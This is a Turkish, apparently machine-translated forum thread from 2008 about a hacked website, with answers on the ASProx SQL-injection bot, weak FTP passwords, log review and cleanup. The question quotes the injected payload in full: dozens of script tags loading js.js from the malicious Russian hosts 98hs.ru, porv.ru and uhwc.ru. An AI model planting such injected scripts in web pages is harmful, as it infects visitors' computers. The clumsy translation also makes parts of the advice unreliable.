Web sitem girildi! .. Ne yapmalıyım?

oy
18

Bugün babam beni aradı ve onun web sitesine giderek insanların bilgisayarlarına indirmeye çalışıyor 168 virüsleri elde edildi söyledi. O hiç teknik değildir ve bir WYSIWYG editör ile her şeyi yaptı.

Açık onun sayfasına attı ve kaynağını inceledi ve Javascript bir çizgi sağ kapanış HTML etiketinden önce kaynağın dibinde içerir yoktu. Onlar (birçoğuna), bu dosyayı dahil: http://www.98hs.ru/js.js <- BUNLARI URL'ye GİTMEK ÖNCE JAVASCRIPT'i KAPATIN.

Bu yüzden şimdilik dışarı yorumladı. Onun FTP şifresi altı harf uzunluğunda düz bir sözlük kelime oldu çıkıyor, bu yüzden o kesmek var nasıl olduğunu düşünüyorum. Biz (o bir av-n-Peck Typer olduğundan o Bir parola gitmezdim) bir 8+ haneli olmayan kelime dizeye şifresini değiştirdik.

Ben yaptım 98hs.ru üzerinde whois ve Şili'de bir sunucudan barındırılan bulundu. Orada da onunla ilişkili bir e-posta adresi aslında, ama ciddiye bu kişinin suçlu şüpheliyim. Kesmek var Muhtemelen sadece bazı diğer site ...

Daha önce bu tür bir şey ele asla ettik olsa bu noktada ne yapacağını bilemezsin. Herhangi birinin önerisi varmı?

O düz jane webhost4life.com aracılığıyla ftp un güvenlikli kullanıyordu. Hatta bir yol göremiyorum yapmak kendi sitesinde sftp. Onun adı ve şifre ele got düşünüyorum?

Yani, topluma bu daha ilgili hale getirmek, sen almalı adımlar saldırıya uğrayan web sitenize korumak için izlemeniz gereken en iyi uygulamalar / nelerdir?

Kayıt için, buraya sihirli adlı dosyaya eklenir (ve onun bilgisayar üzerine dosyasında değil var olduğunu kod çizgidir - Ben sadece hiçbir şey yapmayacağım mutlak emin olmak için dışarı yorumladı bıraktım eminim rağmen bu sayfadaki Jeff) bu karşı korumak olacaktır:

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Oluştur 06/08/2008 saat 00:55
kaynak kullanıcı
Diğer dillerde...                            


8 cevaplar

oy
14

Ben bu geç oyunda biraz biliyorum ama JavaScript için belirtilen URL en azından biz bayrak alma edildiğinde var (Haziran ayında başladı ASPRox bot diriliş parçası olduğu biliniyor sitelerinin listesi belirtilen o). Bu konuda bazı ayrıntılar aşağıda belirtilmiştir:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Bu konuda kötü bir şey etkili bir veritabanında her varchar tipi alan, tarayıcı bir bot dönüşüyor küçücük iframe aldığı bu URL'nin, bir başvuru tükürmek için "bulaşmış" olmasıdır. Bunun için temel bir SQL düzeltme burada bulunabilir:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

korkutucu bir şey olsa değerleri bulaştırmak için ve hosting planları bir sürü de müşterileri için veritabanı alanlarını paylaşan için virüs sistem tablolarına bakar olmasıdır. Yani büyük olasılıkla o bulaşmış bile babanın sitesi, ancak bazı kötü kod yazdım ve Enjeksiyon saldırı SQL kapıyı açtı onun barındırma küme içinde en başkasının site oldu.

O yüzden henüz yapmadı, ben onların ana bilgisayara bir ACİL e-posta göndermek ve onlara tüm sistemi düzeltmek için bu SQL kodu bir bağlantı verirdim. Kendi etkilenen veritabanı tabloları düzeltmek, ancak büyük olasılıkla enfeksiyonu yapıyoruz botlar yine bu doğru delikten geçmek ve sürü bulaştırmak için gidiyoruz.

Umarım bu size çalışmak için biraz daha bilgi verir.

DÜZENLEME: Bir daha çabuk düşünce, o tüm içeriği muhtemelen bir sütunda oturuyor ve bu şekilde enfekte edilmiş, onun web sitesi oluşturmak için ana çevrimiçi tasarım araçları birini kullanarak eğer.

Cevap 07/08/2008 saat 23:49
kaynak kullanıcı

oy
13

Deneyin ve mümkün olduğu kadar çok bilgi toplamak. Ev sahibi hesabınızla yapılan tüm FTP bağlantılarını gösteren bir günlük ayırmasını rica. Bunu değişikliği yapmak ve muhtemelen bir IP adresi almak için kullanılan hatta bir FTP bağlantısı olup olmadığını görmek için bu bilgileri kullanabilirsiniz.

Wordpress, Drupal veya modifikasyon bu tür sağlayan yükleme kodunda açıkları olabilir kod vermedi başka bir şey gibi prepacked yazılımı kullanıyorsanız. o özel inşa edilirse, çift kullanıcıların dosya yüklemek veya mevcut dosyaları değiştirmesine izin herhangi yerleri kontrol edin.

ikinci şey olduğu gibi sitenin dökümü almak ve diğer değişiklikler için her şeyi kontrol etmek olacaktır. Sadece bir tek modifikasyon yaptıkları olabilir, ama bunlar FTP üzerinden var ise kim orada başka ne bilir.

geri bilinen iyi duruma sitenizi döndür ve, gerekirse, en son sürüme yükseltin.

Eğer çok dikkate almak zorunda getiri seviyeleri vardır. Eğer sadece yaşamak ve öğrenmek ve daha güçlü şifreler kullanmak bu şey olduğu kişinin izini çalışırken veya hasar değer mi?

Cevap 06/08/2008 saat 01:16
kaynak kullanıcı

oy
5

Eğer baba bir web sitesi yayınlama aracı kullanıyordu söz.

yayınlama aracı sunucuya onun bilgisayarından yayınlarsa onun yerel dosyalar temiz olup olmadığını durumda olabilir ve o sadece sunucuya tekrar yayınlamak için ihtiyaç duyduğu.

Düz FTP olmaktansa onun sunucuya farklı bir giriş yöntemi varsa o internet üzerinden düz metin olarak onun parolasını gönderdiği için olsa ... o çok güvenli değil, görmelisiniz.

Cevap 06/08/2008 saat 04:31
kaynak kullanıcı

oy
3

Altı kelime karakter şifreyle o kaba zorlanmış olabilir. Bu onun ftp yakalanmadan daha muhtemeldir, ama çok olması olabilir.

daha güçlü bir şifre ile başlayın. (8 karakter hala oldukça zayıftır)

Bir internet Bu linki bakalım güvenlik blogunda yararlıdır.

Cevap 06/08/2008 saat 01:00
kaynak kullanıcı

oy
2

Site sadece düz statik HTML mı? yani o kendini tehlikeye komut / sayfaları upload tarafından sürüş herkes izin veren bir yükleme sayfa kodu başaramadı?

Neden herhangi bir FTP günlükleri mevcut olup olmadığını Webhost4life sormak ve bunlara sorunu bildirmez. Onların oldukça açık olması ve tam olarak ne oldu için dışarı bulabilirsiniz, hiç belli olmaz

Paylaşılan barındırıcınızdan için çalışmak ve biz her zaman bu gibi raporları kabul edilir ve genellikle temelli saldırı tam vektör belirlemekte ve müşteri ters gitti nereye doğru tavsiyelerde bulunabilir.

Cevap 06/08/2008 saat 01:24
kaynak kullanıcı

oy
0

Bu iPower'daki barındırılan geçenlerde benim bir müşteriye oldu. Ben barındırma ortamı Apache dayanıyordu emin değilim, ama eğer onlar orada bazı pislik enjekte etmek eğilimindedir, özellikle hangi görüntü dizinleri webroota üstünde ve içinde yaratmadı .htaccess dosyaları için iki kez kontrol edin yanı (onlar bakınız de nereden geldiğini bağlı insanları yönlendirme edildi). Ayrıca size yazmadım kodunu yarattı herhangi edin.

Cevap 26/09/2008 saat 21:21
kaynak kullanıcı

oy
0

kapatma komut dosyaları önlemek için kapatmadan web sunucusu çıkarın. Bir veri sürücü olarak başka bilgisayar üzerinden sabit diski analiz ve günlük dosyalarında ve bu nitelikteki şeyleri suçlu belirlemek görmek. Kod güvenli olduğundan emin olun ve daha sonra bir yedekten geri.

Cevap 26/09/2008 saat 21:12
kaynak kullanıcı

oy
-1

Biz görünüşte aynı adamlardan kırıldığını! Ya botlar, bizim durumumuzda. Bunlar artık kimse korumak bazı eski klasik ASP sitelerinde URL'ye SQL enjeksiyon kullanılır. Biz IP'leri saldıran bulundu ve IIS onları engelledi. Şimdi hepimiz eski ASP planı ayrı olmalıdır. Yani, benim tavsiyem, IIS ilk oturum de sorun sitenizin kod veya sunucu yapılandırmasında ise bulmak için, bir göz atmaktır.

Cevap 16/08/2008 saat 17:35
kaynak kullanıcı

Cookies help us deliver our services. By using our services, you agree to our use of cookies. Learn more